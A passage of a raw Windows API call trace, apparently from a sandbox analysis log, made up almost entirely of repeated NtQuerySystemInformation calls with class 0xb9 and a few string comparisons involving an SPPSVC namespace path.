(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0273.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x20, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0273.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0273.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcce8, Length=0x50, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0273.463] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0273.464] _wcsicmp 